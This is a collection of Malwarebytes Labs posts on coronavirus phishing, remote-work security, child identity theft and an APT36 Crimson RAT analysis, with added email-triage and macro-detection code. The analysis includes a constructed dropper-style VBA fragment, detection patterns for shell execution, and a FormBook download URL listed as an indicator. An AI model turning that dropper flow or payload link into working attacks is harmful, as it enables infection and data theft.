If Remote Access Trojan programs are found on a system, it should be assumed that any personal information (which has been accessed on the infected machine) has been compromised. Users should immediately update all usernames and passwords from a clean computer, and notify the appropriate system administrator of the potential compromise. Monitor credit reports and bank statements carefully over the following months to spot any suspicious activity on financial accounts.

The NetWire campaign included a slapdash combo of a strange email address, an official-looking WHO logo inside the email’s body, and plenty of typos.

Sent from “Dr. Stella Chungong” using the email address “,” the email subject line is “SAFETY COVID-19 (Coronavirus Virus) AWARENESS – Safety Measures.” The body of the text reads:

To whom it may concern,

Go through the attac=ed document on safety measures regarding the spreading of Corona-virus.

Common symptoms include fever, cough, shortness in breath, and breathi=g difficulties.


Dr. Stella Chungong

Specialist whuan=virus-advisory

The litany of misplaced “=” characters should immediately raise red flags for potential victims. These common mistakes show up in a wide variety of malicious email campaigns, as threat actors seem to operate under the mindset of “Send first, spellcheck later.”

Other malspam campaigns

Most of the coronavirus scams we spotted online are examples of malspam—malicious spam email campaigns that cross the line from phony, snake-oil salesmanship into downright nefarious malware delivery.

Here are a number of malspam campaigns that our threat intelligence team found since March 15.

First up is this strange email titled “RE: Due to outbreak ofCoronavirus,” which arrives to users’ inboxes from the vague sender “Marketing,” with an email address of “” A Google search reveals that appears to point to Boresha Credit Service Limited, a debt collector based in Kenya.

The short email reads:


We have been instructed by your customer to make this transfer to you.

we are unable to process your payment as the SWIFT CODE in your bank account information is wrong,

please see that enclosed invoice and correct SWIFT CODE so we can remit payment ASAP before bank close.”

Again, scrutinizing the details of the email reveals holes in its authenticity.

The email is signed by “Rafhana Khan,” a supposed “Admin Executive” from the United Arab Emirates. The email sender includes this extra bit of info that leads us nowhere: TRN No. 100269864300003.

What is a TRN, and why would it be included? At best, we can assume this is the individual’s “tax registration number,” but think about the last time anyone signed an email with the US equivalent—their tax identification number. You’ve probably never seen that before, right? That’s because tax IDs are meant to be private, and not shared in email signatures. We can assume that the threat actors included this bogus bit of info to add some imaginary credibility. Really, it’s just nonsense.

The email’s attached invoice, once again, pushes GuLoader to the potential victim.

Another spotted malspam example pushes neither GuLoader nor Agent Tesla. Instead, it tries to trick users into downloading malware called HawkEye, a credential stealer that has plagued users since at least 2013.

According to the cybersecurity news outlet Security Affairs, HawkEye “is offered for sale on various hacking forums as a keylogger and stealer, [and] it allows to monitor systems and exfiltrate information.”

The HawkEye scam comes packaged in an email with the subject line “CORONA VIRUS CURE FOR CHINA,ITALY” from the alleged sender “DR JINS (CORONA VIRUS).” Again, potential victims receive a short message. The entire email body reads:

Dear Sir/Ma,

Kindly read the attached file for your quick remedy on CORONA VIRUS.

The email sender lists their place of work as the non-existent, misspelled RESEARCH HOSPITAL ISREAL at the address NO 29 JERUSALEM STREET, P.O.C 80067, ISREAL.

On March 15, we also found an email scam targeting victims in the UK and pushing, yet again, GuLoader. This time, threat actors promised updated statistics on the number of confirmed coronavirus cases in the United Kingdom.

The malicious email comes from the sender “PHE” with the email address, which, like one of the examples above, appears to come from Kenya.

Because threat actors have one, overplayed tactic in these types of campaigns—putting in low effort—the content of the email is simple and short. The email reads:

Latest figures from public health authorities on the spread of Covid-19 in the United Kingdom.

Find out how many cases have been reported near you.

There is no email signature, and not even a greeting. Talk about a lack of email etiquette.

Finally, we found another campaign on March 18 that targets Spanish-speaking victims in Spain. The email, titled “Vacuna COVID-19: prepare la vacuna en casa para usted y su familia para evitar COVID-19,” pushes GuLoader.

The email is signed by “Adriana Erico,” who offers no phone number, but does offer a fax number at 93 784 50 17. Unlike the fake phone number we tested above, we could not test the authenticity of this fax number, because the Bay Area is under a shelter-in-place order, and, truthfully, I don’t own a fax machine in my home.
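The tells the post walks through (a sender that claims to be the WHO from a domain other than .int, a coronavirus lure in the subject, an archive or executable attachment, and stray “=” characters wedged into words as in the NetWire email) can be turned into a mail-gateway triage check. The script below is an added example, not Malwarebytes' code; the sample messages are constructed with placeholder addresses, since the post redacted the real senders, and the “=” test is a crude heuristic that will also trip on legitimate text such as `a=b`.

```python
"""Added example: triage heuristics for WHO-impersonating coronavirus
malspam. Sample messages are constructed; sender addresses are
placeholders standing in for the ones the post redacted."""
import re
from email import message_from_string
from email.message import EmailMessage
from email.policy import default
from email.utils import parseaddr

WHO_DOMAIN = "who.int"  # legitimate WHO addresses end in .int, as the post notes
# "WHO" must be upper case to count as a claim; the long form is case-insensitive.
WHO_CLAIM_RE = re.compile(r"\bWHO\b|(?i:world health organi[sz]ation)")
LURE_RE = re.compile(r"covid|corona\s*-?\s*virus", re.IGNORECASE)
RISKY_EXT = {".gz", ".zip", ".exe", ".iso", ".rar", ".scr"}
STRAY_EQ_RE = re.compile(r"[A-Za-z]=[A-Za-z]")  # "attac=ed", "whuan=virus"


def build_message(sender, subject, body, attachment=None):
    """Construct a raw RFC 5322 message for the demo (hypothetical content)."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = "recipient@example.com"
    msg["Subject"] = subject
    msg.set_content(body)
    if attachment:
        name, data = attachment
        msg.add_attachment(data, maintype="application",
                           subtype="octet-stream", filename=name)
    return msg.as_string()


def plain_text(msg):
    """Concatenate the decoded text/plain bodies, skipping attachments."""
    chunks = []
    for part in msg.walk():
        if part.get_content_type() == "text/plain" and not part.get_filename():
            payload = part.get_payload(decode=True) or b""
            chunks.append(payload.decode(part.get_content_charset() or "utf-8", "replace"))
    return "\n".join(chunks)


def triage(raw):
    """Return the list of findings for one raw message (empty means clean)."""
    msg = message_from_string(raw, policy=default)
    name, addr = parseaddr(msg.get("From", ""))
    domain = addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""
    subject = msg.get("Subject", "")
    findings = []
    claims_who = WHO_CLAIM_RE.search(f"{name} {subject}") is not None
    legit_domain = domain == WHO_DOMAIN or domain.endswith("." + WHO_DOMAIN)
    if claims_who and not legit_domain:
        findings.append("claims WHO but sender domain is " + (domain or "missing"))
    if LURE_RE.search(subject):
        findings.append("coronavirus lure in subject")
    for part in msg.walk():
        fn = part.get_filename()
        if fn and "." in fn and "." + fn.rsplit(".", 1)[-1].lower() in RISKY_EXT:
            findings.append("risky attachment: " + fn)
    if STRAY_EQ_RE.search(plain_text(msg)):
        findings.append("stray '=' inside words")
    return findings


# Constructed samples modelled on the campaigns described in the post.
SAMPLE_WHO_ATTACH = build_message(
    '"World Health Organization" <who-alerts@example.com>',   # placeholder sender
    "World Health Organization/Let's fight Corona Virus together",
    "See attached WHO vital information to stay healthy.",
    ("COVID-19 WHO RECOMMENDED V.gz", b"\x1f\x8bconstructed-not-a-real-archive"),
)
SAMPLE_NETWIRE = build_message(
    '"Dr. Stella Chungong" <advisory@example.net>',            # placeholder sender
    "SAFETY COVID-19 (Coronavirus Virus) AWARENESS - Safety Measures",
    "Go through the attac=ed document on safety measures regarding the "
    "spreading of Corona-virus.\n\nDr. Stella Chungong\nSpecialist whuan=virus-advisory\n",
)
SAMPLE_LEGIT = build_message(
    '"WHO Media" <media@who.int>', "Situation report", "Daily situation report attached.",
)

if __name__ == "__main__":
    for label, raw in [("who-attach", SAMPLE_WHO_ATTACH),
                       ("netwire", SAMPLE_NETWIRE), ("legit", SAMPLE_LEGIT)]:
        print(label, triage(raw))
```
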

Protect yourself

Threat actors are always looking for the next crisis to leverage for their own attacks. For them, coronavirus presents a near-perfect storm. Legitimate confusion about accurate confirmed cases, testing availability, and best practices during social distancing makes for a fearful public, hungry for answers anywhere.

Like we said the last time we looked at COVID-19 scams, the best places for information remain the WHO and the US Centers for Disease Control and Prevention (CDC).

You can find updated statistics about confirmed COVID-19 cases in the WHO’s daily situation reports here.

You can also find information on coronavirus myths at the WHO’s Myth Busters webpage, along with its Q&A page.

To help prevent the spread of the illness, remember, wash your hands for at least 20 seconds, refrain from touching your face, and practice social distancing by maintaining a distance of six feet from people not in your household.

This is difficult, this is new, and for many of us, it presents a life-altering shift. It’s important to consider that, right now, banding together as a global community is our best shot at beating this. That advice extends to the online world, too.

While coronavirus might have brought out the worst in cybercriminals, it’s also bringing out the best across the Internet. This week, a supposed “Covid19 Tracker App” infected countless users’ phones with ransomware, demanding victims pay $100 to unlock their devices or risk a complete deletion of their contacts, videos, and pictures. After news about the ransomware was posted on Reddit, a user decompiled the malicious app and posted the universal passcode to defeat the ransomware. The passcode was then shared on Twitter for everyone to use.

Stay safe, everyone.

The post Coronavirus scams, found and explained appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Security tips for working from home (WFH)

Malware Bytes Security - Thu, 03/19/2020 - 11:00am

Over the last decade, remote work and working from home has grown in popularity for many professionals. In fact, a 2018 study found more than 70 percent of global employees work remotely at least once per week. However, the coronavirus pandemic and resulting lockdown in many parts of the world have forced a large number of employees into unfamiliar territory—not just remote work, but full-time working from home (WFH).

Given these circumstances, we figured it would be useful to share some of the security tips we have for WFH, not just for IT teams who suddenly need to secure their entire remote workforce, but for individuals to take their own precautions.

I have been working remotely for over five years now, from several locations and mostly WFH, so I dare say I can speak from personal experience.

WFH physical security

The first so-obvious-it’s-not-obvious tip is to make sure your work devices are physically safe, and that you avoid offering unauthorized views of confidential information. Here are a few ways to shore up physical security while WFH:

  • If you need to leave your home for supplies or other reasons, make sure your work devices are either shut down or locked—including any mobile phones you might use to check email or make work phone calls.
  • If you live with a roommate or young children, be sure to lock your computer even when you step away for just a bit. Don’t tempt your roommates or family members by leaving your work open. This is true even for the workplace, so it is imperative for WFH.
  • If you can’t carve out a separate work space in your home, be sure to collect your devices at the end of your workday and store them someplace out of sight. This will not only keep them from being accidentally opened or stolen, but will also help separate your work life from your home life.

System access

Perhaps your office network was so protected that little thought was given to restricting access to servers with sensitive data. Or perhaps you now have to work on your personal laptop—one that you didn’t think much about securing before coronavirus upended your life.

Either way, it’s time to start thinking about the ways to guard against unauthorized access. If you think cybercriminals (and regular criminals) will be sensitive to global events and refrain from attacking remote workers, sadly, you’d be mistaken.

  • Access to your computer’s desktop should at least be password protected, and the password should be a strong one. If the system is stolen, this will keep the thief from easily accessing company information.
  • If office network permissions previously gave you unfettered access to work software, now you may be required to enter a variety of passwords to gain access. If your workplace doesn’t already offer a single sign-on service, consider using a password manager. It will be much more secure than a written list of passwords left on your desk.
  • Encryption also helps protect information on stolen or compromised computers. Check whether data encryption is active on your work machine. If you’re not sure, ask your IT department whether you have it, and if they think it’s necessary.
  • If you’re connecting your work computer to your home network, make sure you don’t make it visible to other computers in the network. If you have to add it to the HomeGroup, then make sure the option to share files is off.

Separate work and personal devices

Easier said than done, we know. Still, just as it’s important to carve out boundaries between work life and home life while WFH, the same is true of devices. Do you have a child being homeschooled now and turning in digital assignments? Are you ordering groceries and food online to avoid stores? Best not to cross those hairs with work.

While it may seem cumbersome to constantly switch back and forth between the two, do your best to at least keep your main work computer and your main home computer separate (if you have more than one such device). If you can do the same for your mobile devices—even better. The more programs and software you install, the more potential vulnerabilities you introduce.

  • Don’t pay your home bills on the same computer you compile work spreadsheets on. You can not only create confusion for yourself, but also end up compromising your personal information when a cybercriminal is looking to breach your company.
  • Don’t send work-related emails from your private email address and vice versa. Not only does it look unprofessional, but you are weaving a web that might be hard to untangle once the normal office routine resumes.
  • Speaking of homeschooling, it’s especially important to keep your child’s digital curriculum separate from your work device. Both are huge targets for threat actors. Imagine their delight when they find they can not only plunder an organization’s network through an unsecured remote worker, but they can also collect highly valuable PII on young students, which garners a big pay day on the dark web.

Secure connections

  • Make sure you have access to your organization’s cloud infrastructure and can tunnel in through a VPN with encryption.
  • Secure your home Wi-Fi with a strong password, in case VPN isn’t an option or if it fails for some reason.
  • Access to the settings on your home router should be password protected as well. Be sure to change the default password it came with—no 12345, people!

Cybersecurity best practices

Other WFH security precautions may not be all that different from those you should be practicing in the office, but they are easy to forget when you are working in your own home environment. A few of the most important:

  • Be wary of phishing emails. There will be many going around trying to capitalize on fear related to the coronavirus, questions about isolation and its psychological impacts, or even pretending to offer advice or health information. Scan those emails with a sharp eye and do not open attachments unless they’re from a known, trusted source.
  • Related to phishing: I’m pretty sure we can expect to see a rise in Business Email Compromise (BEC) fraud. Your organization may be sending you many emails and missives about new workflows, processes, or reassurances to employees. Watch out for those disguising themselves as high-ranking employees and pay close attention to the actual email address of senders.
  • Beware of overexposure on social media, and try to maintain typical behavior and routine: Do you normally check social media on your phone during lunchtime? Do the same now. Once again, watch out for scams and misinformation, as criminals love using this medium to ensnare their victims.

Other security precautions

Not every organization was prepared for this scenario, so it’s only natural that some may not have the level of RemoteSec in place that others do. Make sure to get yourself up to speed with the guidelines that your organization has in place for remote work. Ask for directions if anything is unclear. Not everyone has the same level of tech savvy—the only stupid question is one that isn’t asked.

I have listed some of the questions you may need to have answered before you can rest assured that WFH is not going to be a security disaster. Here are some to consider:

  • When you are working remote for long periods, make sure you know who is responsible for updates. Are you supposed to keep everything up to date or can your IT department do it for you?
  • Your system may require additional security software now that it has left the safer environment of your organization’s network. Check with your IT department on whether you should install additional solutions: Will you need a security program for your Windows PC or for your Mac (which was hit with twice as many threats as Windows computers in 2019)? If you’re using an Android device for work, should you download security software that can protect your phone? (iOS doesn’t allow outside antivirus vendors.)
  • How will data storage and backup work? Can you save and back up your local files to a corporate cloud solution? Find out which one they prefer you to use in your specific role.

On a different note

This is a big adjustment for many people. Your first few days of WFH may leave you irritated, uncomfortable, unmotivated, or just plain exhausted. Adding security tips to the list may just add to your fatigue right now. We understand. Take it a day at a time, a step at a time.

When working from home, find a comfortable working area where you can assume a healthy posture, minimize the distraction from others, and where your presence has the least impact on how others have to behave. Take breaks to stretch your legs, and give your eyes a rest. And if you enjoy WFH, now is the time to prove to your employer that it’s a viable option in the long run.

Stay safe, everyone! Now more than ever.

The post Security tips for working from home (WFH) appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Cybercriminals impersonate World Health Organization to distribute fake coronavirus e-book

Malware Bytes Security - Wed, 03/18/2020 - 11:36am

The number of scams, threats, and malware campaigns taking advantage of public concern over the coronavirus is increasing each day. As a result, we’ve been actively monitoring emails within our spam honeypot to flag such threats and make sure our users are protected.

Yesterday, we observed a phishing campaign similar to malspam previously discovered by MalwareHunterTeam, which impersonates the World Health Organization (WHO) and promises the latest on “corona-virus.” Right off the bat, the incorrect use of a hyphen in “coronavirus” in the subject line could tip off users with a critical eye for grammar. However, since WHO are often touted as a trustworthy and authoritative resource, including by our own blog, many will be tempted to open the email.

In this particular campaign, threat actors use a fake e-book as a lure, claiming the “My Health E-book” includes complete research on the global pandemic, as well as guidance on how to protect children and businesses.

The criminals behind this scheme try to trick victims into opening the attachment, contained in a zip file, by offering teaser content within the body of the email, including:

Guidance to protect children and business centre;

This guidance provides critical considerations and practical checklists to keep Kids and business centre safe. It also advises national and local authorities on how to adapt and implement emergency plans for educational facilities.

Critical preparedness, readiness and response actions for COVID-19;

WHO has defined four transmission scenarios for COVID-19. My Health E-book describes the preparedness, readiness and response actions for each transmission scenario.

The email content goes on to tell readers that they can download and access the e-book from Windows computers only.

Instead, as soon as they execute the file inside the archive, malware will be downloaded onto their computers. As seen in the previous wave of spam, the malicious code is for a downloader called GuLoader.

GuLoader is used to load the real payload, an information-stealing Trojan called FormBook, stored in encoded format on Google Drive. Formbook is one of the most popular info-stealers, thanks to its simplicity and its wide range of capabilities, including swiping content from the Windows clipboard, keylogging, and stealing browser data. Stolen data is sent back to a command and control server maintained by the threat actors.

While the threat actors are improving on the campaign’s sophistication by building reputable-sounding content within the body of the email, a closer examination reveals small grammatical errors, such as:

You are now receiving this email because your life count as everyone lives count.

This, combined with other minor formatting and grammar mistakes, as well as a mix-and-match selection of fonts, makes this clever phishing scheme, upon closer examination, a dud. Still, many have fallen for far more obvious ploys.

With a huge swath of the population now confined to their homes but working remotely, the risk of infecting a highly-distributed network is increasing. That’s why it’s more important than ever to use a discerning eye when opening work or personal emails, as employee negligence is one of the top contributors to successful cyberattacks and data breaches.

Malwarebytes home and business customers were already protected against this malspam campaign and its associated payloads.

Indicators of compromise

FormBook URL

[.]com/uc?export=download&id=1vljQdfYJV76IqjLYwk74NUvaJpYBamtE

The post Cybercriminals impersonate World Health Organization to distribute fake coronavirus e-book appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Child identity theft, part 2: How to reclaim your child’s identity

Malware Bytes Security - Tue, 03/17/2020 - 12:33pm

In a world where children as young as a single day old can fall prey to fraud, it is more important than ever to educate parents and other caretakers about the dangers of child identity theft. While the hope is that perceptions can be changed and criminals brought to justice, likely the biggest concern for parents is how to reclaim their child’s identity, should they ever be in such an unfortunate position.

That is, unless the parents or guardians are the ones behind the fraud in the first place. In part 1 of our series on child identity theft, we talked about familiar fraud—fraud committed by someone who personally knows the victim—and how children are increasingly being targeted for this crime. We also touched on the repercussions of familiar fraud in the lives of kids and their families.

In part 2 of our series, we look at turning back the tables and reclaiming your child’s identity, whether it’s been stolen by a stranger or someone who knows them. In addition, we highlight the signs your child’s information might be compromised and how parents or guardians can better protect their data.

Signs of child identity compromise

When it comes to figuring out if a child’s identity has been compromised and is being used, thankfully, there are telltale signs that parents and guardians can look out for. These signs are displayed both in the real world and the digital world. They include:

  • Physical mail arriving to your home that is addressed to your child. These include card applications, banking statements, and credit card or insurance applications for accounts under their name, and they’re the most obvious sign of compromise. Your child may also receive a notice from the IRS either because of unpaid income taxes or having multiple tax returns filed under their SSN.
  • Phone calls received from collection agencies directed to your child.
  • If the landline has a caller ID, your child’s name may appear on it. This indicates that someone has stolen and is misusing their information.
  • A turned-down application for government benefits for your child. This happens when someone with the same SSN as your child may already be receiving those benefits.
  • Bank turning down an account application for a child due to the negative credit score associated with the child’s SSN.
  • Important documents of your child suddenly going missing, including their SSN card and birth certificate.
  • In addition, the Identity Theft Resource Center (ITRC) has listed several documents that may suddenly show up—or, in certain cases, not show up—that potentially give away active ID theft activity.

How to reclaim your child’s identity

Reclaiming a stolen identity takes a lot of work. This is true whether the victim is an adult or a child. And the length of time spent undoing the harm to your child’s reputation potentially correlates with how long the fraud has been taking place before it was identified and acted upon.

If you, dear parent or guardian, have seen any of the telltale signs of identity fraud, immediately contact the top credit bureaus to freeze your child’s credit until they are old enough to enter into a contract. Doing so means that these reports will be taken out of circulation.

A credit report for a child is normally non-existent, but if one is found, the parent or guardian should contact an organization that deals with child identity theft, such as the Identity Theft Report. If a parent would only like to take extra precaution, they can ask the credit reporting agencies (CRAs) Experian, Equifax, and TransUnion, or other smaller bureaus, to create their child’s credit report and freeze it.

It is equally important for parents and/or guardians to keep the PIN that each of these credit bureaus has assigned to them, since it is needed to lift the freeze later.

Beyond freezing and receiving credit reports, other important steps for reclaiming your child’s identity include:

  • Contacting any companies where fraudulent accounts in your child’s name were opened. Tell the fraud department about what happened, and ask them to close the account and send a letter confirming your child isn’t liable. If necessary, send a letter explaining your child is a minor who can’t enter into contracts and attach a copy of their birth certificate.
  • For parents in the United States, contacting the Federal Trade Commission (FTC) at or calling 877-ID-THEFT to report the fraud.

How to protect your child’s identity

In the Experian survey report mentioned in part 1 of our series, more than half of victims (63 percent) wished that their parents had done more to protect them from potential fraud. Interestingly, 61 percent of parents felt the same way.

Awareness of the risks and underlying dangers of child identity theft is something parents should be actively practicing. To avoid opening an opportunity for fraudsters to take advantage of your child’s information, here are some tips:

  • Don’t carry your child’s SSN card. There is no need—keep it safe at home instead.
  • Know when your child’s SSN is really needed when applying for something on their behalf. Schools, for example, don’t ask for a child’s SSN, so there is no need to provide it.
  • When throwing out mail or documents with your personal information or your child’s, shred them before disposing.
  • You may also want to consider getting your child another form of identification, such as a passport or a state identification card.
  • If you receive news of your child’s school getting breached, don’t hesitate to call the school and ask for more information.
  • Inquire about your child’s school directory information policy. Directory information contains a lot of personally identifiable information (PII) about a child, and sometimes such information is shared outside of the school. Parents and/or guardians can either inform the school that it shouldn’t share their child’s information without their express consent, or opt out of having the information shared at all.
  • Keep all important documents of your child in a safe and secure place.

Early detection is key. Getting acquainted with the red flags and keeping an eye out for them can nip fraud in the bud. Not only that, it makes reclaiming and restoring a child’s identity a little easier—emotionally, mentally, and financially.

Half of Experian respondents with children who have been victimized by fraud have learned the hard way not to share personal information with family. Some have also started actively checking credit scores and enrolling for identity theft protection services.

The things we leave behind

It’s easy for adults to forget that, like them, children have data and information that needs protecting, too. And even if their children are too young to use a computing device, they still have digital footprints. The reason? Mom and Dad or other legal guardians leave them behind. Unfortunately, it is unavoidable.

Mom needs to schedule a doctor’s appointment for the little one’s check-up, so she uses her healthcare app. Proud dad shares short clips of his bundle of joy with Aunt Martha, who lives far away and couldn’t visit the newborn in hospital. And before all of this, Mom and Dad announced the pregnancy to all their social media channels.

Sadly, the very activities that give us joy and make tasks convenient can also leave behind breadcrumbs that identity thieves can sniff out and follow. Rarely do parents or guardians stop to think about how their sharing can impact their child’s digital life.

Take, for example, baby pictures you may have shared on social media. They may contain metadata pointing to the location where they were taken. Or when you made that public announcement about your baby on the way: Did you also reveal their name? Fraudsters can easily glean from this information the baby’s full name and location. If they don’t have the child’s SSN yet, they can easily pair it with another SSN to create a synthetic identity.

This isn’t to say that parents and/or guardians should deprive relatives and friends of your little one’s adorable moments, or avoid entering any of their children’s information online. Just be mindful when doing so. Share privately by making use of your social network’s privacy settings. Also caution or remind your relatives and friends to avoid re-sharing media you post to others without your consent.

We’re all in this together

In this age of data breaches, it is easy for us to focus on the security of our own data. But let us be aware that kids and young adults are becoming more of a target, too. Children, especially, are blank slates—a highly-prized quality for someone with access to their information and with malicious intent. Hackers are after them; yet often, it’s those that are closer to them who cause the greatest harm—sometimes without knowing they are doing it. Worse, more than one person could be fraudulently using an innocent child’s identity.

While parents and guardians are advised to be equally vigilant in protecting the data of their children—biological and adopted ones—as much as their own or anyone else’s, we encourage any other responsible adult in the family to take part. If familiar fraud becomes a family problem, it should be a family affair to thwart it at all costs for the future of the most vulnerable in the household.

The post Child identity theft, part 2: How to reclaim your child’s identity appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Lock and Code S1Ep2: On the challenges of managed service providers

Malware Bytes Security - Mon, 03/16/2020 - 11:28am

This week on Lock and Code, we discuss the top security headlines generated right here on Labs and around the Internet. In addition, we talk to two representatives from an Atlanta-based managed service provider—a manager of engineering services and a data center architect—about the daily challenges of managing thousands of nodes and the future of the industry.

Tune in for all this and more on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes store, on Google Play Music, plus whatever preferred podcast platform you use.

We cover our own research on:
  • International Women’s Day: Is awareness of stalkerware, monitoring, and spyware apps on the rise?
  • How a Rocket Loader skimmer impersonates the CloudFlare library in a clever scheme
  • Securing the MSP: What are the best practices for vetting cybersecurity vendors?
  • Remote security, aka RemoteSec, and how to achieve on-prem security levels with cloud-based remote teams
  • How the coronavirus has impacted security conferences and events, including which were cancelled, postponed, or switched over to virtual
  • The effects of climate change on cybersecurity
Plus, other cybersecurity news:
  • FBI warning: Hackers are targeting Office 365, G Suite users with business email compromise attacks. (Source: SiliconAngle)
  • How poor IoT security is allowing the 12-year-old Conficker malware to make a comeback. (Source: ZDNet)
  • Recently discovered spear phishing emails are using HIV test results as a scare factor. (Source: ThreatPost)
  • Talkspace threatened to sue a security researcher over a bug report, and forced him to take down a blog post. (Source: TechCrunch)
  • Independent testing found Google’s Play Protect to be poor on malware protection. (Source: Forbes)
  • Researchers found thousands of fingerprint files exposed in an unsecured database. (Source: Cnet)
  • Researchers discovered a phishing page informing victims about fake Netflix service disruptions, supposedly due to problems with the victim’s payment method. (Source: Sucuri Blog)

Stay safe, everyone!

The post Lock and Code S1Ep2: On the challenges of managed service providers appeared first on Malwarebytes Labs.

Categories: Malware Bytes

APT36 jumps on the coronavirus bandwagon, delivers Crimson RAT

Malware Bytes Security - Mon, 03/16/2020 - 11:00am

Since the coronavirus became a worldwide health issue, the desire for more information and guidance from government and health authorities has reached a fever pitch. This is a golden opportunity for threat actors to capitalize on fear, spread misinformation, and generate mass hysteria—all while compromising victims with scams or malware campaigns.

Profiting from global health concerns, natural disasters, and other extreme weather events is nothing new for cybercriminals. Scams related to SARS, H1N1 (swine flu), and avian flu have circulated online for more than a decade. According to reports from ZDNet, many state-sponsored threat actors have already started to distribute coronavirus lures, including:

  • Chinese APTs: Vicious Panda, Mustang Panda
  • North Korean APTs: Kimsuky
  • Russian APTs: Hades group (believed to have ties with APT28), TA542 (Emotet)
  • Other APTs: Sweed (Lokibot)

Recently, the Red Drip team reported that APT36 was using a decoy health advisory document to spread a Remote Administration Tool (RAT).

APT36 is believed to be a Pakistani state-sponsored threat actor mainly targeting the defense, embassies, and the government of India. APT36 performs cyber-espionage operations with the intent of collecting sensitive information from India that supports Pakistani military and diplomatic interests. This group, active since 2016, is also known as Transparent Tribe, ProjectM, Mythic Leopard, and TEMP.Lapis.

APT36 spreads fake coronavirus health advisory

APT36 mainly relies on both spear phishing and watering hole attacks to gain its foothold on victims. The phishing email carries either a malicious macro document or an RTF file exploiting vulnerabilities such as CVE-2017-0199.

In the coronavirus-themed attack, APT36 used a spear phishing email with a link to a malicious document (Figure 1) masquerading as the government of India ([.]email/?att=1579160420).

Figure 1: Phishing document containing malicious macro code

We looked at the previous phishing campaigns related to this APT and can confirm this is a new phishing pattern from this group. The names used for directories and functions are likely Urdu names.

The malicious document has two hidden macros that drop a RAT variant called Crimson RAT. The malicious macro (Figure 2) first creates two directories with the names “Edlacar” and “Uahaiws” and then checks the OS type.

Figure 2: malicious macro

Based on the OS type, the macro picks either a 32-bit or 64-bit version of its RAT payload in zip format, which is stored in one of the two textboxes in UserForm1 (Figure 3).

Figure 3: embedded payloads in ZIP format

Then it drops the zip payload into the Uahaiws directory and unzips its content using the “UnAldizip” function, dropping the RAT payload into the Edlacar directory. Finally, it calls the Shell function to execute the payload.
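As an added example (not code from the Malwarebytes write-up or from the actor's macro), the following Python triage script scores extracted VBA source against the behaviours described above: stage directories, an OS check, a payload held in a UserForm textbox, an archive written and unpacked on disk, and execution through Shell. The two macro samples, the indicator regexes and the threshold are constructed for this example and would normally be run over text produced by a macro extractor.

```python
"""Heuristic triage of extracted VBA source for the macro-dropper pattern
described in the APT36 write-up. Constructed example: indicator names,
patterns, threshold and the two macro samples are assumptions, not the
actor's code or a vendor signature.
"""
import re

# Each category lists case-insensitive regexes for one behaviour. A macro that
# triggers execution plus several staging behaviours looks like a dropper; any
# single category on its own (MkDir, say) is common in legitimate automation.
INDICATORS = {
    "auto_execute": [r"\bAuto(?:Open|Exec|Close)\b", r"\b(?:Document|Workbook)_Open\b"],
    "creates_directory": [r"\bMkDir\b", r"\.CreateFolder\b"],
    "checks_os_type": [r"#If\s+Win64\b", r"\bPROCESSOR_ARCHITE\w*", r"\bProgramW6432\b"],
    "payload_in_form_control": [r"\bUserForm\w*\.\w*TextBox\w*"],
    "writes_binary_file": [r"\bOpen\b.+\bFor\s+Binary\b", r"\bPut\s+#\d+"],
    "unpacks_archive": [r"\bShell\.Application\b", r"\.CopyHere\b", r"\b\w*zip\w*\b"],
    "executes_payload": [r"\bShell\b(?!\.Application)", r"\bWScript\.Shell\b",
                         r"\bCreateObject\s*\("],
}


def find_indicators(vba_source: str) -> dict:
    """Map each behaviour category to the distinct source fragments that matched."""
    hits = {}
    for category, patterns in INDICATORS.items():
        matched = {m.group(0) for pat in patterns
                   for m in re.finditer(pat, vba_source, re.IGNORECASE)}
        if matched:
            hits[category] = sorted(matched)
    return hits


def classify_macro(vba_source: str, min_categories: int = 4) -> tuple:
    """Return (is_dropper_like, hits).

    Execution is required, plus enough staging behaviour (min_categories in
    total) to separate a dropper from an ordinary automation macro.
    """
    hits = find_indicators(vba_source)
    dropper_like = "executes_payload" in hits and len(hits) >= min_categories
    return dropper_like, hits


# Constructed fragment mirroring the flow described in the write-up (stage
# directory names taken from the text). Blob decoding and the unzip helper
# body are omitted, so this is illustrative text for the detector, not a
# functioning macro.
DROPPER_LIKE_VBA = r'''
Sub AutoOpen()
    Dim stage As String, blob As String
    stage = Environ("APPDATA")
    MkDir stage & "\Edlacar"
    MkDir stage & "\Uahaiws"
    #If Win64 Then
        blob = UserForm1.TextBox2.Text
    #Else
        blob = UserForm1.TextBox1.Text
    #End If
    Open stage & "\Uahaiws\p.zip" For Binary As #1
    Close #1
    UnAldizip stage & "\Uahaiws\p.zip", stage & "\Edlacar"
    Shell stage & "\Edlacar\p.exe"
End Sub
'''

# Constructed benign macro: formats a worksheet header and notifies the user.
BENIGN_VBA = r'''
Sub FormatReport()
    With ActiveSheet.Range("A1:D1")
        .Font.Bold = True
        .Interior.Color = RGB(200, 200, 200)
    End With
    ActiveSheet.Columns("A:D").AutoFit
    MsgBox "Report formatted", vbInformation
End Sub
'''


if __name__ == "__main__":
    for name, src in (("dropper-like", DROPPER_LIKE_VBA), ("benign", BENIGN_VBA)):
        flag, hits = classify_macro(src)
        print(f"{name}: {'DROPPER-LIKE' if flag else 'ok'} ({len(hits)} categories)")
        for category, fragments in hits.items():
            print(f"  {category}: {fragments}")
```

The categories double as the fields an analyst would record when triaging a sample, so the same function can feed a ticket or a blocklist decision rather than only a console report.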

Crimson RAT

The Crimson RAT is written in .NET (Figure 4) and its capabilities include:

  • Stealing credentials from the victim’s browser
  • Listing running processes, drives, and directories on the victim’s machine
  • Retrieving files from its C&C server
  • Using custom TCP protocol for its C&C communications
  • Collecting information about antivirus software
  • Capturing screenshots

Figure 4: Crimson RAT

Upon running the payload, Crimson RAT connects to its hardcoded C&C IP addresses and sends collected information about the victim back to the server, including a list of running processes and their IDs, the machine hostname, and its username (Figure 5).

Figure 5: TCP communications

Ongoing use of RATs

APT36 has used many different malware families in the past, but has mostly deployed RATs, such as BreachRAT, DarkComet, Luminosity RAT, and njRAT.

In past campaigns, they were able to compromise Indian military and government databases to steal sensitive data, including army strategy and training documents, tactical documents, and other official letters. They also were able to steal personal data, such as passport scans and personal identification documents, text messages, and contact details.

Protection against RATs

